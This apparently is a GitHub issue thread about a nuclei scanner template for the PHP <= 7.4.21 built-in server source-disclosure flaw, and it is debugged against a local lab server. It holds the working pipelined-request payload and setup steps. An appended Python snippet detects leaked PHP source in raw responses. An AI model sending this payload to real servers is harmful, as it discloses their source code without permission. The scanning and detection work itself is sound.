Unable to get complete server response using extractors
I want to write a template to exploit the PHP <= 7.4.21 source code disclosure vulnerability, but I cannot match the result using nuclei.
I used Wireshark to monitor the traffic and found that the server returned a body.
I tried the following methods, but could not output the body content returned by the server.
I checked the issue history and found no relevant problems, but I found that print_debug can be used to print the returned results. I used print_debug to view the returned results, and no body content was found.
I'm sorry to bother you
@LinuxProgramDevelop Just remove the matcher block if you are only looking to extract the info.
Sorry, my English is not good. My problem is that the server's phpinfo code in the second picture is not in the result in the fourth picture
@LinuxProgramDevelop Just remove the matcher block if you are only looking to extract the info.
My payload has been sent, and the server has returned the PHP source code, but there is no phpinfo code in the data in nuclei, so I cannot judge the success of the attack.
This is my template:
id: php-src-diclosure

info:
  name: PHP <= 7.4.21 - Built-in Server Remote Source Disclosure
  author: pdteam
  severity: medium
  metadata:
    verified: true
    shodan-query: The requested resource <code class="url">
  tags: php,phpcli,disclosure

network:
  - inputs:
      - data: "GET index.php HTTP/1.1\nHost: 172.17.0.131:888\n\nGET /xyz.xyz HTTP/1.1\n\n"
    host:
      - "{{Hostname}}"
    read-size: 4096
    extractors:
      - type: regex
        part: all
        regex:
          - '(.*\n.*.*)'
The vulnerability environment can be started with the following command:
php.exe -S 0.0.0.0:888 -n -t ./
Place an index.php file in the current directory. The content is: <?php phpinfo();?>
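
Added example, not part of the original thread or the nuclei project: a Python check that takes the raw bytes read from one connection (for instance exported from the Wireshark capture mentioned above), splits the back-to-back HTTP responses, and reports any body that still contains a PHP open tag. The sample buffer is constructed, and the function names are hypothetical.

```python
import re

# Constructed sample: two responses read back-to-back from one TCP connection,
# as the pipelined request pair in the template would produce.
# Not captured from a real server.
SAMPLE = (
    b"HTTP/1.1 200 OK\r\nHost: 127.0.0.1:888\r\nContent-Length: 19\r\n\r\n"
    b"<?php phpinfo();?>\n"
    b"HTTP/1.1 404 Not Found\r\nContent-Length: 9\r\n\r\nNot Found"
)

# A PHP open tag in a response body means the file was served unexecuted.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def split_responses(buf):
    """Split a raw read buffer into (status_line, headers, body) tuples."""
    out = []
    while buf.startswith(b"HTTP/"):
        head, sep, rest = buf.partition(b"\r\n\r\n")
        if not sep:
            break  # header block cut off, e.g. by a small read size
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        if b"content-length" in headers:
            n = int(headers[b"content-length"])
        else:
            n = len(rest)  # no length given: treat the remainder as the body
        # A body shorter than n means the read stopped before the full body.
        out.append((lines[0].decode("latin-1"), headers, rest[:n]))
        buf = rest[n:]
    return out


def leaked_source(buf):
    """Return the bodies that still contain an unexecuted PHP open tag."""
    return [body for _, _, body in split_responses(buf)
            if PHP_OPEN_TAG.search(body)]


if __name__ == "__main__":
    for status, _, body in split_responses(SAMPLE):
        print(status, len(body), bool(PHP_OPEN_TAG.search(body)))
```

Running the same functions over the bytes a scanner actually received shows whether the body was missing from the read or only from the extractor output.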